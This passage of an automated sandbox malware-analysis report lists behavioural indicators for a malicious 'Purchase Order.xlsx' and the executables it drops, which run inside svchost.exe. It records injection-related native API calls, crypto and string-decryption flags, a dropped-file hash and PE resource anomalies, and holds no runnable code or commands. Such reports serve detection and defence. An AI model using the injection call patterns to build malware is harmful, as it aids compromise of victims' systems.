Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_0084FB68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk, 10_2_0084FC60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FD8C NtDelayExecution,LdrInitializeThunk, 10_2_0084FD8C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_0084FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_0084FED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FFB4 NtCreateSection,LdrInitializeThunk, 10_2_0084FFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008510D0 NtOpenProcessToken, 10_2_008510D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00850048 NtProtectVirtualMemory, 10_2_00850048
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00850060 NtQuerySection, 10_2_00850060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00850078 NtResumeThread, 10_2_00850078
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008501D4 NtSetValueKey, 10_2_008501D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085010C NtOpenDirectoryObject, 10_2_0085010C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00851148 NtOpenThread, 10_2_00851148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084F8CC NtWaitForSingleObject, 10_2_0084F8CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00851930 NtSetContextThread, 10_2_00851930
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084F938 NtWriteFile, 10_2_0084F938
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FA20 NtQueryInformationFile, 10_2_0084FA20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FA50 NtEnumerateValueKey, 10_2_0084FA50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FBE8 NtQueryVirtualMemory, 10_2_0084FBE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FC90 NtUnmapViewOfSection, 10_2_0084FC90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FC30 NtOpenProcess, 10_2_0084FC30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00850C40 NtGetContextThread, 10_2_00850C40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FC48 NtSetInformationFile, 10_2_0084FC48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00851D80 NtSuspendThread, 10_2_00851D80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FD5C NtEnumerateKey, 10_2_0084FD5C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FEA0 NtReadVirtualMemory, 10_2_0084FEA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FE24 NtWriteVirtualMemory, 10_2_0084FE24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FFFC NtCreateProcessEx, 10_2_0084FFFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FF34 NtQueueApcThread, 10_2_0084FF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000981D0 NtCreateFile, 10_2_000981D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00098280 NtReadFile, 10_2_00098280
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00098300 NtClose, 10_2_00098300
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000983B0 NtAllocateVirtualMemory, 10_2_000983B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00098284 NtReadFile, 10_2_00098284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000982FA NtClose, 10_2_000982FA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000983AB NtAllocateVirtualMemory, 10_2_000983AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0078632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 10_2_0078632E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007867C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 10_2_007867C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00786332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 10_2_00786332
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007867C2 NtQueryInformationProcess, 10_2_007867C2
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C342D5: CreateFileW,DeviceIoControl,CloseHandle, 5_2_00C342D5
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403461
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406925 4_2_00406925
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C4E37C 5_3_03C4E37C
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C3133F 5_3_03C3133F
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C3F24C 5_3_03C3F24C
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C5322F 5_3_03C5322F
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CC01DD 5_3_03CC01DD
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C2D15B 5_3_03C2D15B
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C5113B 5_3_03C5113B
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C467DB 5_3_03C467DB
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C27753 5_3_03C27753
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C22705 5_3_03C22705
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CC1638 5_3_03CC1638
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C3945A 5_3_03C3945A
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CA5B9A 5_3_03CA5B9A
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C2CBBC 5_3_03C2CBBC
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C2EAC1 5_3_03C2EAC1
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C24A80 5_3_03C24A80
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CC2A22 5_3_03CC2A22
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C3C9F0 5_3_03C3C9F0
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C31889 5_3_03C31889
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CADFDA 5_3_03CADFDA
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C1FFD7 5_3_03C1FFD7
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CCCFA4 5_3_03CCCFA4
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C47F00 5_3_03C47F00
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CD3E83 5_3_03CD3E83
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C36DFE 5_3_03C36DFE
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CC0D8E 5_3_03CC0D8E
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C22DB2 5_3_03C22DB2
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CA5D55 5_3_03CA5D55
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03CBFCEE 5_3_03CBFCEE
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C2CC5C 5_3_03C2CC5C
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C42C6D 5_3_03C42C6D
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BF33B7 5_2_00BF33B7
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BD1663 5_2_00BD1663
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BF23F5 5_2_00BF23F5
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C58400 5_2_00C58400
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C06502 5_2_00C06502
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BDE6F0 5_2_00BDE6F0
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C0265E 5_2_00C0265E
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BF282A 5_2_00BF282A
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C2391F 5_3_03C2391F
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B871 6_2_0041B871
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041CBC6 6_2_0041CBC6
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041BBDB 6_2_0041BBDB
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041C3A2 6_2_0041C3A2
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041BC4D 6_2_0041BC4D
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00408C6B 6_2_00408C6B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00408C70 6_2_00408C70
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00408C2A 6_2_00408C2A
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041BCF3 6_2_0041BCF3
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B4B6 6_2_0041B4B6
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041BD21 6_2_0041BD21
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00402D89 6_2_00402D89
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041C7FE 6_2_0041C7FE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BEE0C6 6_2_00BEE0C6
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C0905A 6_2_00C0905A
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C1D005 6_2_00C1D005
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF3040 6_2_00BF3040
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BEE2E9 6_2_00BEE2E9
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C91238 6_2_00C91238
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C163DB 6_2_00C163DB
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BEF3CF 6_2_00BEF3CF
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C963BF 6_2_00C963BF
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C3A37B 6_2_00C3A37B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF2305 6_2_00BF2305
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF7353 6_2_00BF7353
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C25485 6_2_00C25485
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C01489 6_2_00C01489
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C2D47D 6_2_00C2D47D
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C7443E 6_2_00C7443E
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C0C5F0 6_2_00C0C5F0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C36540 6_2_00C36540
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF351F 6_2_00BF351F
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF4680 6_2_00BF4680
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BFE6C1 6_2_00BFE6C1
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C92622 6_2_00C92622
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C3A634 6_2_00C3A634
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C257C3 6_2_00C257C3
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BFC7BC 6_2_00BFC7BC
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C7579A 6_2_00C7579A
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C8F8EE 6_2_00C8F8EE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C1286D 6_2_00C1286D
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BFC85C 6_2_00BFC85C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF29B2 6_2_00BF29B2
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C069FE 6_2_00C069FE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C9098E 6_2_00C9098E
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C7394B 6_2_00C7394B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C75955 6_2_00C75955
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00CA3A83 6_2_00CA3A83
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C7DBDA 6_2_00C7DBDA
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BEFBD7 6_2_00BEFBD7
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C9CBA4 6_2_00C9CBA4
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C17B00 6_2_00C17B00
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C8FDDD 6_2_00C8FDDD
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BFCD5B 6_2_00BFCD5B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C20D3B 6_2_00C20D3B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C0EE4C 6_2_00C0EE4C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C22E2F 6_2_00C22E2F
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C62FDC 6_2_00C62FDC
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C8CFB1 6_2_00C8CFB1
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C1DF7C 6_2_00C1DF7C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00C00F3F 6_2_00C00F3F
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00401030 6_1_00401030
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041C3A2 6_1_0041C3A2
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B4B6 6_1_0041B4B6
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041C7FE 6_1_0041C7FE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B871 6_1_0041B871
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041CBC6 6_1_0041CBC6
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041BBDB 6_1_0041BBDB
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041BC4D 6_1_0041BC4D
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00408C6B 6_1_00408C6B
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00408C70 6_1_00408C70
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00408C2A 6_1_00408C2A
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041BCF3 6_1_0041BCF3
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041BD21 6_1_0041BD21
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00402D89 6_1_00402D89
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00402D90 6_1_00402D90
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00402FB0 6_1_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085E0C6 10_2_0085E0C6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0088D005 10_2_0088D005
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00863040 10_2_00863040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0087905A 10_2_0087905A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085E2E9 10_2_0085E2E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00901238 10_2_00901238
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_009063BF 10_2_009063BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085F3CF 10_2_0085F3CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008863DB 10_2_008863DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00862305 10_2_00862305
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00867353 10_2_00867353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008AA37B 10_2_008AA37B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00895485 10_2_00895485
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00871489 10_2_00871489
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008E443E 10_2_008E443E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0089D47D 10_2_0089D47D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0087C5F0 10_2_0087C5F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0086351F 10_2_0086351F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008A6540 10_2_008A6540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00864680 10_2_00864680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0086E6C1 10_2_0086E6C1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00902622 10_2_00902622
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008AA634 10_2_008AA634
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008E579A 10_2_008E579A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0086C7BC 10_2_0086C7BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008957C3 10_2_008957C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008FF8EE 10_2_008FF8EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0086C85C 10_2_0086C85C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0088286D 10_2_0088286D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0090098E 10_2_0090098E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008629B2 10_2_008629B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008769FE 10_2_008769FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008E394B 10_2_008E394B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008E5955 10_2_008E5955
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00913A83 10_2_00913A83
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0090CBA4 10_2_0090CBA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085FBD7 10_2_0085FBD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008EDBDA 10_2_008EDBDA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00887B00 10_2_00887B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008FFDDD 10_2_008FFDDD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00890D3B 10_2_00890D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0086CD5B 10_2_0086CD5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00892E2F 10_2_00892E2F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0087EE4C 10_2_0087EE4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008FCFB1 10_2_008FCFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008D2FDC 10_2_008D2FDC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00870F3F 10_2_00870F3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0088DF7C 10_2_0088DF7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009B4B6 10_2_0009B4B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009C7FE 10_2_0009C7FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009B871 10_2_0009B871
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009CBC6 10_2_0009CBC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009BBDB 10_2_0009BBDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00088C2A 10_2_00088C2A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009BC4D 10_2_0009BC4D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00088C6B 10_2_00088C6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00088C70 10_2_00088C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00082D89 10_2_00082D89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00082D90 10_2_00082D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00082FB0 10_2_00082FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007867C7 10_2_007867C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00785062 10_2_00785062
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007832FF 10_2_007832FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00781362 10_2_00781362
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00783302 10_2_00783302
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007875B2 10_2_007875B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_007808F9 10_2_007808F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00780902 10_2_00780902
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Purchase Order.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00419F80 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00C33F92 appears 132 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 0041A0B0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00BEDF5C appears 119 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00C3373B appears 244 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00BEE2A8 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: String function: 00C5F970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0085E2A8 appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 008CF970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 008A373B appears 245 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 008A3F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0085DF5C appears 120 times
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: String function: 03C1E35C appears 96 times
PE file contains strange resources
Source: scancopy87867678[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
